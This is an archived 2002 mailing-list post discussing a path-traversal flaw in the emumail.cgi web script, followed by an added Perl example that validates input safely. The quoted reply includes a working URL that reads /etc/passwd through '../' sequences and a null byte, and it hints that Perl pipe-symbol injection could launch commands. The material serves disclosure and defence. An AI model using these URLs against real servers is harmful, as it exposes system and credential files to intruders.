Re: emumail.cgi

From: Randal L. Schwartz (merlynat_private)
Date: Tue Apr 09 2002 - 12:14:17 PDT


    >>>>> "MegaHz" == MegaHz  <adminat_private> writes:
    
    MegaHz> u can also do this:
    MegaHz> http://site/emumail.cgi?type=/../../../../../etc/passwd%00
    
    MegaHz> but u cannot do this:
    MegaHz> http://site/emumail.cgi?type=/../../../../../bin/ls%20/%00
    
    It's Perl, so I bet they didn't check for pipe symbols at the
    beginning and ending either.  That can launch things.
    
    I wish people who write Perl code for the net would at *least* read
    the Perl Web Security FAQ *at a minimum*, or hire an outside Perl
    company (like Stonehenge :) to vet the code.
    
    -- 
    Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095
    <merlynat_private> <URL:http://www.stonehenge.com/merlyn/>
    Perl/Unix/security consulting, Technical writing, Comedy, etc. etc.
    See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training!
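
An added example, not part of the original message and not EMUmail's own code: one way a Perl CGI could handle a `type`-style parameter so that neither the traversal strings quoted above nor a leading or trailing pipe symbol reach `open`. The template directory, the `.html` suffix and the `open_template` name are assumptions made for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Spec;
use Cwd qw(realpath);

# Hypothetical template directory; not taken from the EMUmail code base.
my $TEMPLATE_DIR = '/var/www/templates';

# Returns a read-only filehandle for the template named by $type,
# or undef if the value is not acceptable or the file cannot be opened.
sub open_template {
    my ($type) = @_;
    return undef unless defined $type;

    # Allow-list: a short name of letters, digits, underscore and hyphen.
    # This rejects "/", "..", NUL bytes, "|" and whitespace in one step.
    # \z (not $) is used so a trailing newline cannot slip through.
    return undef unless $type =~ /\A[A-Za-z0-9_-]{1,32}\z/;

    my $path = File::Spec->catfile($TEMPLATE_DIR, "$type.html");

    # Resolve symlinks and confirm the result is still under the
    # template directory.
    my $base = realpath($TEMPLATE_DIR);
    my $real = realpath($path);
    return undef unless defined $base && defined $real;
    return undef unless index($real, "$base/") == 0;

    # Three-argument open: the mode is fixed to '<', so the filename is
    # never parsed for a leading or trailing "|" as two-argument open does.
    open(my $fh, '<', $real) or return undef;
    return $fh;
}

# Constructed sample inputs: a plain name, the traversal form quoted in
# the thread, a NUL-terminated name, and names with a pipe at either end.
for my $candidate ('inbox', '/../../../../../etc/passwd', "inbox\0",
                   '|inbox', 'inbox|') {
    (my $shown = $candidate) =~ s/\0/\\0/g;
    my $fh = open_template($candidate);
    printf "%-32s %s\n", $shown, $fh ? 'opened' : 'rejected';
    close $fh if $fh;
}
```

Running the script under `perl -T` additionally makes Perl refuse to pass unvalidated CGI input to `open` for writing or to any command execution.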
    


